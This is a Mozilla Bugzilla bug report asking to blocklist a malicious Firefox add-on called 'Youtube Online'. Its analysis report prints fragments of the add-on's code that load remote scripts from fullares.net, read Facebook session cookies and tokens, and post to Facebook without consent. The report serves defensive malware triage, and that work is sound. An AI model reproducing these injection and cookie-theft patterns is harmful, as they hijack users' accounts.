Bug 728476 - Malicious "Youtube Online" add-on
Status: RESOLVED FIXED
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
Assigned To: Jorge Villalobos [:jorgev]
Reported: 2012-02-17 16:14 PST by MarkH
Modified: 2016-03-07 15:30 PST (History)


Attachments
facebookmusica.com.output.zip (31.04 KB, application/octet-stream)
2012-02-17 16:14 PST, MarkH

Description MarkH 2012-02-17 16:14:49 PST
Created attachment 598422 [details]
facebookmusica.com.output.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11

Steps to reproduce:

Downloaded the add-on from http://facebookmusica.com/youtube.xpi


Actual results:

Report for http://facebookmusica.com/youtube.xpi

** Embedded and Remote Files **

chrome.manifest
content/prefman.js
content/skin/icon.png
content/script-compiler.js
content/youtube.js
http://fullares.net/campanita/script.js
http://fullares.net/campanita/extra.js
content/xmlhttprequester.js
content/script-compiler-overlay.xul
http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
install.rdf


** Embedded Metadata **

<em:name>Youtube Online</em:name>
<em:version>1.4.0</em:version>
<em:targetApplication>
<em:minVersion>2.0</em:minVersion>
<em:maxVersion>10.*</em:maxVersion>
</em:targetApplication>
<em:creator>YOUTU</em:creator>
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>
<em:description>Ve videos youtube mas rapido y ligero</em:description>
<em:homepageURL>http://poringa.me/</em:homepageURL>
<em:updateURL>http://http/://poringa.me/update.rdf</em:updateURL>
...<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUtKPOGhnhlxo7vRoSR
0YC1g/Mo...


** Files Loaded **

...overlay	chrome://browser/content/browser.xul	chrome://youtube/content/sc
ript-com...
'chrome://youtube/content/youtube.js'
...pt type='application/x-javascript'
src='chrome://youtube/content/youtube.js'></s...
<em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL>


** Remote Javascript Loaded **

...nt/browser.xul	chrome://youtube/content/script-compiler-overlay.xul
var	scriptableStream=Components
.classes["@mozilla.org/scriptableinputstream;1"]
.getService(Components.interfaces.nsIScriptableInputStream);
.classes["@mozilla.org/intl/scriptableunicodeconverter"]
.createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
scriptableStream.init(input);
var	str=scriptableStream.read(input.available());
scriptableStream.close();
var script=youtube_gmCompiler.getUrlContents(
youtube_gmCompiler.injectScript(script, href, unsafeWin);
injectScript: function(script, url, unsafeContentWin) {
var sandbox, script, logger, storage, xmlhttpRequester;
var storage=new youtube_ScriptStorage();
"(function(){"+script+"})()",
e2.fileName=script.filename;
function youtube_ScriptStorage() {
youtube_ScriptStorage.prototype.setValue = function(name, val) {
youtube_ScriptStorage.prototype.getValue = function(name, defVal) {
loadScript_you();
function loadScript_you() {
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://fullares.net/campanita/script.js");
function addScript() {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
s.setAttribute("src", "http://fullares.net/campanita/extra.js");
...ppendChild|cl|oo|createElement|function|script|onload|no|javascript|type
|js|php|...
var a = document.getElementsByTagName('script')[0];
addScript();
// this function gets called by user scripts in content security scope to
...eymaster/gatekeeper/there.is.only.xul'><script
type='application/x-javascript' s...
<Description about="urn:mozilla:install-manifest">
<Description>
</Description>
<em:description>Ve videos youtube mas rapido y ligero</em:description>
</Description>


** Facebook Paths Accessed **

...(location.href.match(/^http:\/\/(www\.)?facebook.com/i)){
window.location = 'htt...
...=new
XMLHttpRequest();gf['open']('GET','/ajax/typeahead/first_degree.php?__a=1&f
...
...=new XMLHttpRequest();var
d='http://www.facebook.com/ajax/profile/composer.php?_...
...(location.href.match(/^http:\/\/(www\.)?facebook.com/i)){var
cook=readCookie("fv...


** Facebook Cookies Accessed **

...n fb_comparte(){var user_id=readCookie('c_user');var
uid=user_id;if(document['ge...
...yName']('post_form_id')[0]['value'];var
fb_dtsg=document['getElementsByName']('f...
...g';var
e='post_form_id='+post_form_id+'&fb_dtsg='+fb_dtsg+'&xhpc_composerid=u574..
.
...var user_id=readCookie('c_user');if(user_id==null)return
false;cook=readCookie("...


** HTTP Requests **

...n video??'];var message='';var a;gf=new
XMLHttpRequest();gf['open']('GET','/ajax...
...randomValue(p3)]['join'](' ');var c=new XMLHttpRequest();var
d='http://www.faceb/...
var req = new this.chromeWindow.XMLHttpRequest();


** All URLs Loaded or Mentioned **

// http://www.letitblog.com/code/python/greasemonkey.py.txt
// http://greasemonkey.devjavu.com/
....)?facebook.com/i)){ window.location =
'http://poringa.me/facebook.html'; }
blogs[0] = 'http://www.quebuenamusica.org/campanita/';
blogs[1] = 'http://bit.ly/uDUmmB';
blogs[2] = 'http://bit.ly/s7SPp7';
...){ifra.style.marginLeft="0px";ifra.src="http://voltor.info/video/video.h
tml"}
...L='<iframe id="change" width="500"
src="http://fullares.net/campanita/unlock.php...
...alue'];var video_url=blog;var
domains=['http://i40.tinypic.com/8zenw6.png'];var ...
...(' ');var c=new XMLHttpRequest();var
d='http://www.facebook.com/ajax/profile/com...
s.setAttribute("src", "http://fullares.net/campanita/extra.js");
s.setAttribute("src", "http://fullares.net/campanita/script.js");
...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul<
/code></...
...<dd><a
href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org/.
..
...<?xml version="1.0"?><overlay
xmlns='http://www.mozilla.org/keymaster/gatekeeper...
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<em:homepageURL>http://poringa.me/</em:homepageURL>
<em:updateURL>http://http/://poringa.me/update.rdf</em:updateURL>


Expected results:

It should not steal your Facebook cookies and post to Facebook without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-02-18 09:09:30 PST
Add-on ID: youtube2@youtube2.com
Comment 2 Jorge Villalobos [:jorgev] 2012-02-18 09:10:50 PST
https://addons.mozilla.org/en-US/firefox/blocked/i67
